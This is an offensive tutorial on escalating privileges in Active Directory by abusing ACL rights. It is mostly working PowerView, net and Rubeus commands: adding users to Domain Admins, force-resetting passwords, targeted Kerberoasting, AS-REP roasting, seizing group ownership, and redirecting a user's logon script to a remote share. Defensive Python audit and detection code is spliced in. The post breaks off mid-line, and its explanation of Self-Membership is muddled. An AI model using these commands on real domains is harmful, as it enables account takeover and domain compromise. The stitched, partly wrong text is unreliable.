Title: How to use the intranet Active Directory

Abuse of Active Directory ACL/ACE permissions

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse

https://www.cnblogs.com/nice0e3/p/15879624.html

DACL and ACE are access control concepts that are used throughout operating systems and network environments. A detailed explanation follows.

DACL (Discretionary Access Control List): a DACL is an access control list that determines who can access a specific object (a file, folder, registry key, etc.). A DACL is a list of access control entries (ACEs).

ACE (Access Control Entry): an ACE is the basic unit of a DACL and is used to grant or deny access to the object. Each ACE names a security principal (a user, group, computer, etc.) and the permissions that principal has. In a DACL, each ACE contains the following information:

Security principal (SID): the unique identifier of the user, group or computer whose access is granted or denied.
Access permissions: the specific operations or rights involved (such as read, write, execute, etc.).
Access mask: the permissions that are actually granted or denied.
Auxiliary access mask: in some cases, used to specify further conditions or restrictions.

When an object is accessed, the system checks the ACEs in its DACL. Access is allowed if there is an ACE that matches the user's identity and grants the requested permission. If there is no matching ACE, or a matching ACE denies the requested permission, access is denied.
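To make the evaluation order concrete, here is an added example (not code from the original post) that models the Windows DACL check in Python using the ActiveDirectoryRights bit values from System.DirectoryServices; the SIDs and the DACL are constructed, and generic-right mapping of the request is left out.

```python
# Added example (not from the original post): a simplified model of the
# Windows DACL check, using ActiveDirectoryRights bit values from
# System.DirectoryServices. ACE order matters: a matching deny ACE that covers
# a still-needed right denies immediately, allow ACEs accumulate rights, an
# empty DACL grants nothing and a NULL DACL grants everything.
from dataclasses import dataclass

SELF, READ_PROPERTY, WRITE_PROPERTY = 0x8, 0x10, 0x20
READ_CONTROL, WRITE_DACL, WRITE_OWNER = 0x20000, 0x40000, 0x80000
GENERIC_WRITE = 0x20028   # ReadControl | WriteProperty | Self
GENERIC_ALL = 0xF01FF


@dataclass
class Ace:
    allow: bool     # True = ACCESS_ALLOWED, False = ACCESS_DENIED
    trustee: str    # SID of the security principal the ACE applies to
    mask: int       # ActiveDirectoryRights bits granted or denied


def access_check(dacl, token_sids, requested):
    """True if every bit in `requested` is granted to a token holding
    `token_sids`. dacl=None models a NULL DACL, [] an empty DACL."""
    if dacl is None:
        return True
    remaining = requested
    for ace in dacl:
        if ace.trustee not in token_sids:
            continue                     # ACE is for someone else
        if not ace.allow:
            if ace.mask & remaining:     # deny wins for any unmet right
                return False
            continue
        remaining &= ~ace.mask           # allow ACE satisfies some rights
        if remaining == 0:
            return True
    return remaining == 0


# Constructed DACL on a user object (SIDs are made up): deny spotless
# WriteDacl, then allow Authenticated Users GenericWrite and Domain Admins
# GenericAll. The deny sits first, as canonical ACE ordering requires.
SPOTLESS_SID, DOMAIN_ADMINS_SID, AUTH_USERS = (
    "S-1-5-21-1-2-3-1105", "S-1-5-21-1-2-3-512", "S-1-5-11")
DACL = [
    Ace(False, SPOTLESS_SID, WRITE_DACL),
    Ace(True, AUTH_USERS, GENERIC_WRITE),
    Ace(True, DOMAIN_ADMINS_SID, GENERIC_ALL),
]
SPOTLESS_TOKEN = {SPOTLESS_SID, AUTH_USERS}
ADMIN_TOKEN = {"S-1-5-21-1-2-3-500", DOMAIN_ADMINS_SID, AUTH_USERS}
```

Note that spotless still gets WriteProperty through the Authenticated Users allow ACE; only the explicitly denied WriteDacl bit is blocked.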

The ACEs of the domain administrator are shown below.

[screenshot omitted]

Among them, the permissions we are concerned with are the following:

GenericAll - full rights to the object (e.g. add users to a group or reset a user's password)
GenericWrite - update the object's attributes (e.g. the logon script)
WriteOwner - change the object's owner to an attacker-controlled user and take over the object
WriteDACL - modify the object's ACEs and grant the attacker full control over the object
AllExtendedRights - ability to add a user to a group or reset a password
ForceChangePassword - ability to change a user's password
Self (Self-Membership) - ability to add yourself to a group

Self-Membership refers to the right of an account to add itself to a group. The ACE has to be added in the advanced permissions of a given group, i.e. it applies to group objects: the object holds the Self-Membership identity on that group.
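The rights above are bits in the ActiveDirectoryRights access mask. As an added example (not code from the original post), the following Python audit decodes masks in the shape PowerView's Get-ObjectAcl returns them (without -ResolveGUIDs, so ObjectType is a GUID) and flags ACEs that grant these rights to a principal outside a privileged allow-list; the allow-list, helper names and sample ACEs are assumptions.

```python
# Added example (not from the original post): audit ACEs in the shape
# PowerView's Get-ObjectAcl returns them (without -ResolveGUIDs, so ObjectType
# is a GUID), flagging the rights listed above when an allow ACE grants them to
# a principal outside a privileged allow-list (the allow-list is an assumption).
ALL_OBJECTS = "00000000-0000-0000-0000-000000000000"
SELF_MEMBERSHIP = "bf9679c0-0de6-11d0-a285-00aa003049e2"       # "member" attribute
FORCE_CHANGE_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"  # extended right
RIGHTS = {  # ActiveDirectoryRights values, most inclusive first
    "GenericAll": 0xF01FF, "GenericWrite": 0x20028,
    "WriteDacl": 0x40000, "WriteOwner": 0x80000,
    "ExtendedRight": 0x100, "WriteProperty": 0x20, "Self": 0x8,
}
# rights that only matter for specific object types (or ObjectType = All)
SCOPED = {"ExtendedRight": {FORCE_CHANGE_PASSWORD},
          "WriteProperty": {SELF_MEMBERSHIP}, "Self": {SELF_MEMBERSHIP}}
PRIVILEGED = {"OFFENSE\\Domain Admins", "OFFENSE\\Enterprise Admins", "NT AUTHORITY\\SYSTEM"}

def decode(mask):
    """Listed rights held by a mask; a generic right swallows the specific
    rights it contains, so GenericAll does not also report WriteDacl."""
    names = []
    for name, bits in RIGHTS.items():
        if mask & bits == bits:
            names.append(name)
            mask &= ~bits
    return names

def dangerous_aces(aces, privileged=PRIVILEGED):
    """Return (ObjectDN, IdentityReference, right) triples to investigate."""
    findings = []
    for a in aces:
        if a["AceType"] != "AccessAllowed" or a["IdentityReference"] in privileged:
            continue
        for right in decode(a["ActiveDirectoryRights"]):
            scope = SCOPED.get(right)
            if scope is None or a["ObjectType"] in scope | {ALL_OBJECTS}:
                findings.append((a["ObjectDN"], a["IdentityReference"], right))
    return findings

def ace(dn, who, mask, obj_type=ALL_OBJECTS, kind="AccessAllowed"):
    return {"ObjectDN": dn, "IdentityReference": who, "ObjectType": obj_type,
            "ActiveDirectoryRights": mask, "AceType": kind}

# Constructed sample using the post's lab names (spotless, delegate)
DA_DN = "CN=Domain Admins,CN=Users,DC=offense,DC=local"
USER_DN = "CN=delegate,CN=Users,DC=offense,DC=local"
SAMPLE = [
    ace(USER_DN, "OFFENSE\\spotless", 0xF01FF),                       # GenericAll
    ace(DA_DN, "OFFENSE\\spotless", 0x8, SELF_MEMBERSHIP),              # Self-Membership
    ace(USER_DN, "OFFENSE\\helpdesk", 0x100, "12345678-0000-0000-0000-000000000000"),
    ace(DA_DN, "OFFENSE\\Domain Admins", 0xF01FF),                      # expected, skipped
]
```

The helpdesk ACE is not flagged because its ExtendedRight is scoped to a constructed GUID that is neither All nor User-Force-Change-Password.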

GenericAll

GenericAll permissions to user accounts

Use the PowerView tool to view the user's GenericAll permissions.

powershell -exec bypass

Import-Module .\PowerView.ps1

# Get the access control list (ACL) of the AD object of user man1, filter for entries with the 'GenericAll' right

Get-ObjectAcl -SamAccountName man1 -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq 'GenericAll'}

You can see that the spotless user has GenericAll permission over the delegate user, so once the spotless user's account has been obtained we can take over the delegate user.

[screenshot omitted]

**Change password:** reset the delegate user's password directly.

net user username password /domain

**Kerberoasting attack:** set an SPN on the delegate user, then use the spotless user's TGT to request service tickets (STs), obtain the ST encrypted with the delegate user's password hash, and crack it offline.

# Set SPN

Set-DomainObject -Credential $creds -Identity username -Set @{serviceprincipalname='fake/NOTHING'}

# Get Hash

.\Rubeus.exe kerberoast /user:username /nowrap

# Clean SPN

Set-DomainObject -Credential $creds -Identity username -Clear serviceprincipalname -Verbose

https://github.com/ShutdownRepo/targetedKerberoast

python3 targetedKerberoast.py -d domain.local -u username -p password -v

**AS-REP roasting attack:** you can make a user AS-REP roastable by disabling Kerberos pre-authentication and then perform an AS-REP roasting attack on it.

# Toggle the DONT_REQ_PREAUTH flag (4194304 = 0x400000) in userAccountControl
Set-DomainObject -Identity username -XOR @{UserAccountControl=4194304}

GenericAll permissions to user groups

# Get the distinguishedName of the Domain Admins group

Get-NetGroup 'domain admins'

[screenshot omitted]

# Get the ACL of the Domain Admins group (no leading space inside the quoted DN)

Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq 'CN=Domain Admins,CN=Users,DC=vvvv1,DC=com'}

[screenshot omitted]

It was found that the spotless user has GenericAll permission over the Domain Admins group, so the group can be attacked.

Add yourself (user spotless) or other users to the Domain Admin group.

net group 'domain admins' spotless /add /domain

You can also use the Active Directory module or PowerSploit for the attack.

# with active directory module

Add-ADGroupMember -Identity 'domain admins' -Members spotless

# with Powersploit

Add-NetGroupUser -UserName spotless -GroupName 'domain admins' -Domain 'offense.local'

GenericAll permissions to machine or service accounts

If you have GenericAll or GenericWrite permission on a machine account or service account, consider a resource-based constrained delegation attack; for details see "Lateral movement on the intranet: resource-based constrained delegation". For service accounts you can also use the attack methods for user accounts above, or attack with Shadow Credentials: https://book.hacktricks.xyz/window-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials

https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab

http://www.hackdig.com/02/hack-599160.htm

https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html

WriteProperty

WriteProperty permissions to user groups

The user we control has WriteProperty permission on the Domain Admins group.

[screenshot omitted]

This user can be added to the Domain Admins group to escalate privileges.

powershell -exec bypass

Import-Module .\PowerView.ps1

Add-NetGroupUser -UserName user -GroupName 'domain admins' -Domain 'vvvv1.com'

Self (Self-Membership)

Self (Self-Membership) permissions to user groups

The user we control has Self (Self-Membership) permission on the Domain Admins group.

[screenshot omitted]

This permission also allows the user to be added to the group, so add the user to the Domain Admins group to escalate privileges.

powershell -exec bypass

Import-Module .\PowerView.ps1

Add-NetGroupUser -UserName user -GroupName 'domain admins' -Domain 'vvvv1.com'

'WriteProperty (Self-Membership)' and 'Self (Self-Membership)' are both attributes related to self-membership, but they differ in meaning.

'WriteProperty (Self-Membership)': this property indicates that the object can write (modify) its own properties. Generally speaking, an object can only modify the properties of other objects, but cannot directly modify its own properties. When the 'WriteProperty (Self-Membership)' property is set, the object can modify its own properties.

'Self (Self-Membership)': this property indicates that the object itself is a member of the group or collection it is located in. It is different from the 'WriteProperty (Self-Membership)' property: 'Self (Self-Membership)' indicates that the object itself is a member of its group or collection, while 'WriteProperty (Self-Membership)' indicates that the object has permission to modify its own properties.

Summary: if the object type is not ALL but Self-Membership, the user object we are querying belongs to this user group. The 'WriteProperty (Self-Membership)' attribute gives the object permission to modify its own attributes, so that the object can be added to the group; the 'Self (Self-Membership)' attribute indicates that the object itself is a member of the group or collection it is located in, and the object can likewise be added to the group.

WriteProperty (Self-Membership)

WriteProperty (Self-Membership) permissions to user groups

The user we control has WriteProperty (Self-Membership) permission on the Domain Admins group.

Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq 'CN=Domain Admins,CN=Users,DC=offense,DC=local' -and $_.IdentityReference -eq 'OFFENSE\spotless'}

[screenshot omitted]

This permission also allows the user to be added to the group, so add the user to the Domain Admins group to escalate privileges.

net group 'domain admins' spotless /add /domain

ForceChangePassword

ForceChangePassword permissions to user accounts

If, in the ACL of the target account, our controlled account holds an 'ExtendedRight' ACE whose object type is 'User-Force-Change-Password', we can reset the user's password without knowing the current password.

powershell -exec bypass

Import-Module .\PowerView.ps1

Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq 'OFFENSE\spotless'}

[screenshot omitted]

Use the tool PowerView to modify the password.

Set-DomainUserPassword -Identity delegate -Verbose

[screenshot omitted]

Or use the following commands:

$c=Get-Credential

Set-DomainUserPassword -Identity delegate -AccountPassword $c.Password -Verbose

Or condensed into a single line:

Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

[screenshot omitted]

WriteOwner

WriteOwner permissions to user groups

Before the attack was carried out, the owner of Domain Admins was Domain Admins.

[screenshot omitted]

After enumerating the ACEs of a group, if we find that the user under our control, spotless, has the 'WriteOwner' right and that right applies to 'ObjectType: All', the owner of the group can be changed.

Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq 'CN=Domain Admins,CN=Users,DC=offense,DC=local' -and $_.IdentityReference -eq 'OFFENSE\spotless'}

[screenshot omitted]

We can change the owner of the 'Domain Admins' object to our user, which in our case is 'spotless'. It should be noted that the SID specified with '-Identity' is the SID of the 'Domain Admins' group.

Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -OwnerIdentity 'spotless' -Verbose

# You can also use the name instead of the SID (HTB: Reel)

Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'spotless'

GenericWrite

GenericWrite is also a value in the access mask. This right allows updating attribute values of the target object; PowerView's Set-DomainObject can be used to set the target attribute.

GenericWrite permissions to user accounts

Get-ObjectAcl -ResolveGUIDs -SamAccountName delegate | ? {$_.IdentityReference -eq 'OFFENSE\spotless'}

The controlled user spotless has the 'WriteProperty' right on another user, delegate, and this right applies to the 'Script-Path' object type. It allows an attacker to overwrite the delegate user's logon script path, which means that the next time the delegate user logs in, their system will execute our malicious script.

[screenshot omitted]

Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue '\\10.0.0.5\totallyLegitScript.ps1'

You can see that the login script field of the delegate user is updated in AD.

[screenshot omitted]

GenericWrite permissions to user groups

Allows you to add new users (such as yourself) as members of the group. This is the same as the "GenericAll permissions to user groups" operation above.

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse

# Create creds

$pwd=ConvertTo-SecureString 'JustAWeirdPwd!$' -AsPlainText -Force

$creds=New-Object System.Management.Automation.PSCredential('DOMAIN\username', $pwd)

# Add user to group

Add-DomainGroupMember -Credential $creds -Identity 'Group Name' -Members 'username' -Verbose

# Check user was
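Every step in this post writes a handful of AD attributes (member, scriptPath, servicePrincipalName, userAccountControl, the security descriptor). As an added example (not code from the original post), the following Python triage runs over constructed records shaped like Windows Security event 5136 (Directory Service Changes) and rates those writes; the admin allow-list, field names and helper names are assumptions, and 5136 is only produced for objects whose SACL audits writes.

```python
# Added example (not from the original post): triage logic for the attribute
# writes this post performs, run over constructed records shaped like Windows
# Security event 5136 (Directory Service Changes; writes are only logged when
# the object's SACL audits them). Field names mirror the event's "LDAP Display
# Name" and "Operation Type" fields; the admin allow-list is an assumption.
WATCHED = {  # attribute -> what a write to it means in this post
    "scriptPath": "logon script overwrite (GenericWrite on a user)",
    "servicePrincipalName": "SPN set on a user (targeted Kerberoast)",
    "userAccountControl": "UAC changed, e.g. pre-auth disabled (AS-REP roast)",
    "member": "group membership changed (GenericAll/WriteProperty/Self)",
    "nTSecurityDescriptor": "DACL or owner changed (WriteDacl/WriteOwner)",
}
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
ADMIN_ACCOUNTS = {"OFFENSE\\Administrator"}   # constructed allow-list

def rdn(dn):
    """First RDN value of a DN: 'CN=Domain Admins,CN=Users,...' -> 'Domain Admins'."""
    return dn.split(",", 1)[0].split("=", 1)[1]

def triage_5136(events):
    """Return (severity, subject, object_dn, attribute, reason) for each
    watched write by a non-admin; privileged-group and DACL writes are high."""
    alerts = []
    for ev in events:
        attr = ev["LDAPDisplayName"]
        if ev["EventID"] != 5136 or attr not in WATCHED:
            continue
        if ev["SubjectAccount"] in ADMIN_ACCOUNTS:
            continue
        high = attr == "nTSecurityDescriptor" or (
            attr == "member" and rdn(ev["ObjectDN"]) in PRIVILEGED_GROUPS)
        alerts.append(("high" if high else "medium", ev["SubjectAccount"],
                       ev["ObjectDN"], attr, WATCHED[attr]))
    return alerts

def event(subject, dn, attr, value, op="Value Added", eid=5136):
    return {"EventID": eid, "SubjectAccount": subject, "ObjectDN": dn,
            "LDAPDisplayName": attr, "Value": value, "OperationType": op}

# Constructed events mirroring the steps in this post (lab names from the post)
DA_DN = "CN=Domain Admins,CN=Users,DC=offense,DC=local"
USER_DN = "CN=delegate,CN=Users,DC=offense,DC=local"
SAMPLE = [
    event("OFFENSE\\spotless", DA_DN, "member", "CN=spotless,CN=Users,DC=offense,DC=local"),
    event("OFFENSE\\spotless", USER_DN, "scriptPath", "\\\\10.0.0.5\\totallyLegitScript.ps1"),
    event("OFFENSE\\spotless", USER_DN, "servicePrincipalName", "fake/NOTHING"),
    event("OFFENSE\\spotless", USER_DN, "description", "new desc"),        # not watched
    event("OFFENSE\\Administrator", DA_DN, "member", "CN=ops,CN=Users,DC=offense,DC=local"),
]
```

In a real deployment the allow-list should be derived from group membership rather than account names, and the SPN and userAccountControl cases benefit from correlating the later "Value Deleted" clean-up write the post performs.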
